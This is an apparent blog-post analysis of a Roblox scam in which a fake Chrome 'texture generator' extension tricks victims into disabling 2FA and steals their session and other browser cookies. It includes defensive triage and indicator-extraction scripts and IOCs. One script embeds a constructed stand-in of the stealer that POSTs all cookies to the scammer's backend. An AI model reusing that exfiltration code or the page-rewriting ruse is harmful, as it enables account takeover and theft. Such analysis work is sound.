Scam Overview
Written February 2024
For the uninitiated, Roblox is a popular online game platform these days. In August 2020 it had over 164 million monthly active users, including more than half of all American children under 16. (That young user base happens to include a teenager in my family too, which is why you’re finding me writing about a Roblox scam today.)
With such popularity, scams have long existed in the Roblox community centered on stealing a user’s .ROBLOSECURITY session cookie. That cookie is the authenticated session token itself, so whoever holds it can present it to Roblox and be logged in as the victim without ever going through the login page, which means any 2FA/MFA on the account is bypassed. Ultimately, the scammer is looking to take over the victim’s Roblox account, even if only temporarily, to take their valuable items and in-game currency, called Robux, and then convert those items to real cash or cryptocurrency. For those interested in more backstory, a detailed writeup from Vice on Roblox scammers, called “beamers”, and the Roblox black market can be found here.
The scam analyzed in this article is a variation that uses Discord to connect the scammer with Roblox users (the victims) and, after some social engineering, gets the victim to install a malicious Google Chrome extension that sends the .ROBLOSECURITY cookie to the scammer.
Scam Analysis
Part 1 – The Scammer Identifies Their Victim
The scammer begins the scam by identifying victims in the Roblox game itself whose characters have rare and valuable items. For example, if the scammer sees a character wearing “Poisoned Horns of the Toxic Wasteland”, this will immediately catch their eye as these limited edition horns are worth 599k Robux. If you were to purchase enough Robux with USD through the game’s legitimate marketplace, this would cost over $5000!
Part 2 – The Scammer Performs Social Engineering
After identifying their victim, the scammer messages them using in-game chat and claims they want to make artwork, i.e. a rendering, of the victim’s character since their appearance is so cool. The scammer then encourages the victim to move the conversation to Discord so they can send photos of the artwork, which is not possible through the in-game chat (and which also decouples the scammer’s in-game Roblox account from a Discord account that Roblox does not monitor).
Through Discord, the scammer sends 3D artwork of the victim’s character pulled from the victim’s in-game character model. However, the artwork sent over has no color – it just appears as a solid grey figurine.
As part of the ruse, the scammer tells the victim that they aren’t able to add the “textures” to their artwork without some help, and the victim will need to navigate to rendercraft[.]eu to download a “texture generator” plugin – plugin here, as we will find out, means a Google Chrome extension.
At first glance, the scammer’s website looks legitimate, but searching for the company Render Craft turns up a different hostname, rendercraft.com. Our first red flag during analysis: the real Render Craft, rendercraft.com, has had its domain registered since 2008, while rendercraft[.]eu was newly registered in January 2024. A newly registered domain is suspicious on its own, and it is very likely that the scammer is impersonating the real Render Craft with a cloned website.
Back to the website, the plugin download button is front and center. However, as a careful observer will notice, the download link points to a Google Drive file, not to a file hosted on the website itself. This also means the victim will need to be logged in to a Google account to download the Chrome extension.
Part 3 – The Victim Installs The Malicious Chrome Extension
The Google Drive link downloads RenderCraftTextureGenerator.zip to the victim’s computer. This Google Chrome extension is not in the Chrome Web Store and has to be loaded into Chrome manually, with Chrome’s Developer mode turned on and the unpacked folder loaded by hand, which is another big red flag. “Luckily” for the victim, a video tutorial on how to install the plugin is provided on the scammer’s website.
Part 4 – The Beginning of the Heist
Once the extension has been installed, the victim first interacts with the extension to “Enable Dev Mode.” This looks harmless at first glance, but Roblox actually doesn’t have a developer mode.
Additionally, you can’t enable this “developer mode” without inputting your 2FA/MFA code or password. What is going on here?! Before we continue looking at the scammer’s heist from the victim’s perspective, let’s start analyzing the code to see what is happening at this moment.
Unpacking the extension’s .zip file reveals a few files of interest: manifest.json, popup.html, and, in the scripts folder, popup.js, content.js, and background.js.
The manifest file is required for Chrome extensions and lists important information about the structure and behavior of the extension. Among other things, we can see at a glance this extension:
- Has “permissions” to access “cookies”
- Uses popup.html to control what displays when the user clicks on the extension (the “browser_action” section)
- Will run a content script, content.js, for any Roblox URL we have open in Chrome, allowing it to read the contents of those pages and make changes to them (the “content_scripts” section)
- Will run a background script, background.js, to handle events seen by the extension (the “background” section)
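The manifest is the cheapest place to start triage, because the permission set alone tells you what the scripts are capable of before you read a line of them. The following is an added example, not code from the original article or from the extension it analyzes: a small Node script that scores a manifest for the combinations that matter here (cookie access plus host scope, content scripts injected into a target site, background code, and the absence of a Web Store update_url). SAMPLE_MANIFEST is constructed to match the structure the article describes; the “<all_urls>” host scope is an assumption, since that is what chrome.cookies.getAll needs in order to return cookies for every site, which is the behaviour described later in the article. The script also handles Manifest V3 layouts (host_permissions, action, service_worker), which goes beyond the V2 manifest discussed above.

```javascript
// Added example: static triage of a Chrome extension manifest.
// Not code from the article or from the malicious extension. SAMPLE_MANIFEST is
// constructed from the article's description; "<all_urls>" is an assumption.
const SAMPLE_MANIFEST = {
  manifest_version: 2,
  name: "RenderCraft Texture Generator",
  version: "1.0",
  permissions: ["cookies", "<all_urls>"],
  browser_action: { default_popup: "popup.html" },
  content_scripts: [
    { matches: ["*://*.roblox.com/*"], js: ["scripts/content.js"] },
  ],
  background: { scripts: ["scripts/background.js"] },
};

// Permissions that, in a sideloaded extension, justify reading the code.
const RISKY_PERMISSIONS = {
  cookies: "can read and rewrite cookies for every host it has scope on",
  webRequest: "can observe network requests",
  webRequestBlocking: "can modify or block network requests",
  tabs: "can read URLs and titles of open tabs",
  history: "can read browsing history",
  clipboardRead: "can read the clipboard",
  nativeMessaging: "can talk to native programs on the machine",
  debugger: "can attach the DevTools protocol to any tab",
};

// Match patterns that cover every site, e.g. "<all_urls>", "*://*/*", "https://*/*".
function isBroadMatch(pattern) {
  return pattern === "<all_urls>" || /^(\*|https?):\/\/\*\/\*$/.test(pattern);
}

function triageManifest(manifest) {
  const findings = [];
  // MV2 keeps host patterns in "permissions"; MV3 moves them to "host_permissions".
  const perms = [...(manifest.permissions || []), ...(manifest.host_permissions || [])];
  const hostScope = perms.filter((p) => p === "<all_urls>" || p.includes("://"));
  for (const p of perms) {
    if (RISKY_PERMISSIONS[p]) {
      findings.push({ severity: "high", detail: `${p}: ${RISKY_PERMISSIONS[p]}` });
    } else if (isBroadMatch(p)) {
      findings.push({ severity: "high", detail: `host scope ${p} covers every site` });
    }
  }
  // The combination behind silent session theft: cookie access plus host scope.
  if (perms.includes("cookies") && hostScope.length) {
    findings.push({ severity: "critical", detail: `chrome.cookies can read cookies for: ${hostScope.join(", ")}` });
  }
  // Content scripts run inside the page and can rewrite it; a script scoped to
  // one site is exactly what a UI-tampering attack on that site needs.
  for (const cs of manifest.content_scripts || []) {
    for (const m of cs.matches || []) {
      findings.push({
        severity: isBroadMatch(m) ? "high" : "medium",
        detail: `${(cs.js || []).join(", ")} injected into pages matching ${m}`,
      });
    }
  }
  // MV2 background page scripts or MV3 service worker: code with no visible page.
  const bg = manifest.background || {};
  const bgFiles = bg.scripts || (bg.service_worker ? [bg.service_worker] : []);
  if (bgFiles.length) {
    findings.push({ severity: "info", detail: `background code: ${bgFiles.join(", ")}` });
  }
  // Chrome adds update_url to extensions installed from the Web Store; a folder
  // loaded by hand in Developer mode has none.
  if (!manifest.update_url) {
    findings.push({ severity: "low", detail: "no update_url: not installed through the Chrome Web Store" });
  }
  return findings;
}

// Highest severity present, so a batch of manifests can be sorted quickly.
function maxSeverity(findings) {
  const order = ["info", "low", "medium", "high", "critical"];
  return findings.reduce(
    (worst, f) => (order.indexOf(f.severity) > order.indexOf(worst) ? f.severity : worst),
    "info"
  );
}

console.log(maxSeverity(triageManifest(SAMPLE_MANIFEST)));
console.log(JSON.stringify(triageManifest(SAMPLE_MANIFEST), null, 2));
```

Run it against the manifest.json pulled out of the zip (`JSON.parse(fs.readFileSync("manifest.json"))` in place of SAMPLE_MANIFEST). A “critical” result does not prove malice on its own, since password managers and cookie editors legitimately need the same pair of permissions, but for an extension that claims to generate textures it is the signal to go straight to the scripts.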
Starting with popup.html, it looks pretty straightforward – for example, some simple HTML to create a button labeled “Enable Dev Mode” that we saw moments ago. We see the JavaScript file popup.js is loaded as well via the <script> tag.
Upon attempting to analyze/reverse engineer popup.js (and all the other JavaScript files), we find a third (at minimum) red flag here as the code has been obfuscated.
After a little research, I found that the code was obfuscated using obfuscator.io, and, conveniently, there is a web-based deobfuscator at webcrack.netlify.app. Reversing the obfuscation is necessary so we can read the code and perform our analysis; obfuscator.io also encodes string literals, so URLs and cookie names are not visible until this step is done.
Ah ha! Popup.js shows us what happens when we click “Enable Dev Mode” – it opens the Roblox Account Security page.
Not only that, once the browser is on the Account Security page, content.js rewrites it. First, it hides content we would expect to see there, such as the list of devices currently logged in to this Roblox account. At the same time, it relabels the 2FA security toggle as the “developer mode” toggle. The victim thinks they are enabling a secret developer mode, but in reality they are disabling their account’s 2FA, and the password or 2FA prompt we saw in Part 4 is simply Roblox’s own verification step for changing that setting.
Part 5 – The Heist Continues
Back to the victim’s perspective: after enabling developer mode, the Chrome extension popup now prompts them to generate textures, the reason for all this work in the first place. The extension says it is working on generating those textures, but nothing happens. Did we do it wrong?
Let’s jump into the background.js file to see the final pieces to this heist.
Background.js is rather short compared to content.js, but it turns out you can still have one heck of a grand finale even without a lot of code.
The function checkForCookieAndSend() looks specifically for the .ROBLOSECURITY cookie we discussed in the Scam Overview and then calls fetchUserInfoAndSend() to send this cookie to the scammer’s backend data collection server, which we will look at more closely in a moment.
There is also a function called grabNonRobloxCookiesAndSendToBackend(), which grabs ALL other cookies in Chrome and calls sendToBackend() to ship them to the same server. This is especially scary, as the malicious extension can compromise victim accounts well beyond Roblox: recall that the victim had to be signed in to Google to download the extension from Google Drive in the first place, so we can expect the Google session cookies to be among those stolen.
The backend server they set up is located at rendercraft-backend[.]org and is configured to receive the data via HTTP POST requests to various paths. This sendToBackend() function in particular posts to /sendallcookies in JSON format.
Finally, some of the victim’s data, like the user ID, is sent via a Discord webhook. There are no connections to Discord URLs directly in the extension; assuming the function name is accurate, it uses the backend server’s /sendkey path as a middleman, and the backend relays to Discord.
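Once the scripts are deobfuscated, the indicators above (cookie API calls, the cookie name being targeted, the collection host and its paths) can be pulled out mechanically rather than by reading every function. The following is an added example, not code from the article or from the extension: a Node script that scans a deobfuscated extension source for the cookie-exfiltration pattern and reports the results defanged in the same notation the article uses for its IOCs. SAMPLE_BACKGROUND_JS is a constructed stand-in that mirrors the behaviour described above (the function names, paths and backend host come from the text; the real code was not reproduced on the page), and the Discord webhook check is a generalization the sample does not exercise. It must be run on the webcrack output, since the obfuscated original encodes its string literals.

```javascript
// Added example: extracting exfiltration indicators from a deobfuscated extension
// script. Not code from the article or from the malicious extension.
// SAMPLE_BACKGROUND_JS is constructed to mirror the article's description.
const SAMPLE_BACKGROUND_JS = `
const BACKEND = "https://rendercraft-backend.org";
function sendToBackend(path, data) {
  fetch(BACKEND + path, { method: "POST", body: JSON.stringify(data) });
}
function checkForCookieAndSend() {
  chrome.cookies.get({ url: "https://www.roblox.com/", name: ".ROBLOSECURITY" },
    (c) => { if (c) fetchUserInfoAndSend(c.value); });
}
function fetchUserInfoAndSend(token) { sendToBackend("/sendkey", { token }); }
function grabNonRobloxCookiesAndSendToBackend() {
  chrome.cookies.getAll({}, (all) => sendToBackend("/sendallcookies", all));
}
`;

// Hosts an extension aimed at Roblox would legitimately contact; any other host
// that receives data is a candidate collection server.
const EXPECTED_HOSTS = [/(^|\.)roblox\.com$/];

// Defang a hostname for a report, matching the article's IOC notation.
function defang(host) {
  return host.replace(/\./g, "[.]");
}

function extractExfilIndicators(source) {
  // Direct use of the cookies API: the only way an extension reads cookies for
  // sites it has no content script on.
  const cookieApiCalls = [...source.matchAll(/chrome\.cookies\.(getAll|get|set|remove)\b/g)]
    .map((m) => m[0]);
  // Cookie names passed explicitly, e.g. { name: ".ROBLOSECURITY" }.
  const cookieNames = [...new Set(
    [...source.matchAll(/name\s*:\s*["'`]([^"'`]+)["'`]/g)].map((m) => m[1])
  )];
  // Every absolute URL literal, parsed so hosts can be separated from paths.
  const urls = [...source.matchAll(/https?:\/\/[A-Za-z0-9.\-]+(?:\/[^\s"'`)]*)?/g)]
    .map((m) => new URL(m[0]));
  const externalHosts = [...new Set(
    urls.map((u) => u.hostname).filter((h) => !EXPECTED_HOSTS.some((re) => re.test(h)))
  )];
  // Path literals concatenated onto a base URL at runtime, e.g. "/sendkey".
  const endpointPaths = [...new Set(
    [...source.matchAll(/["'`](\/[a-z][a-z0-9_\-\/]*)["'`]/gi)].map((m) => m[1])
  )];
  // Any way of getting data off the machine from a background script.
  const usesNetwork = /\bfetch\s*\(|XMLHttpRequest|navigator\.sendBeacon/.test(source);
  // Direct Discord webhooks (the article notes this sample has none; the backend relays instead).
  const discordWebhooks = [...source.matchAll(/https:\/\/discord(?:app)?\.com\/api\/webhooks\/[^\s"'`]+/g)]
    .map((m) => m[0]);
  const verdict = cookieApiCalls.length && usesNetwork && (externalHosts.length || discordWebhooks.length)
    ? "likely cookie exfiltration"
    : "no exfil pattern matched";
  return {
    cookieApiCalls,
    cookieNames,
    externalHosts: externalHosts.map(defang),
    endpointPaths,
    usesNetwork,
    discordWebhooks,
    verdict,
  };
}

console.log(JSON.stringify(extractExfilIndicators(SAMPLE_BACKGROUND_JS), null, 2));
```

Feed it each deobfuscated script in turn (`fs.readFileSync("background.js", "utf8")`); the defanged externalHosts and endpointPaths are exactly the items that end up in an abuse report to the registrar or host, and the cookieNames list shows whether the extension is after one specific session or everything in the cookie jar.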
Actions Taken & Timeline
- Jan 13th – Family member gets scammed
- Jan 14th – Reported abuse for render-craft[.]org and rendercraft-backend[.]org to registrar and webhost
- Jan 15th – Registrar suspends render-craft[.]org
- Jan 27th – Discovery of new domains operating this scam – rendercraft[.]eu and rendercraft-backend[.]online
- Jan 27th – Reported abuse for rendercraft[.]eu to webhost and rendercraft-backend[.]online to registrar
- Jan 29th – rendercraft-backend[.]org is suspended by the registrar
- Jan 31st – rendercraft-backend[.]online is suspended by the registrar
- Feb 2nd – rendercraft[.]eu is suspended by the webhost
IOCs
Hostnames & URLs
rendercraft[.]eu
render-craft[.]org
rendercraft-backend[.]org
rendercraft-backend[.]online
https://drive[.]google[.]com/uc?export=download&id=1eCwas4kwTDQjomZHT3vv355Ft-Faezta
https://drive[.]google[.]com/uc?export=download&id=1hKHzi0595oxETSL68zfMxZsoRFWkDlj0
IPs
191[.]101[.]104[.]245
191[.]101[.]104[.]152
191[.]96[.]144[.]129
216[.]24[.]57[.]1
File Hashes
Chrome Extension RenderCraftTextureGenerator.zip
27e15e4d4e59e57cc04f6bb36da012fd511052a26c323ccdca69faf4ffc4ea0a
f65a4f2bed5ffef1a4f9b5255c1ed75caa31a02cae30e9c75d861efa97778472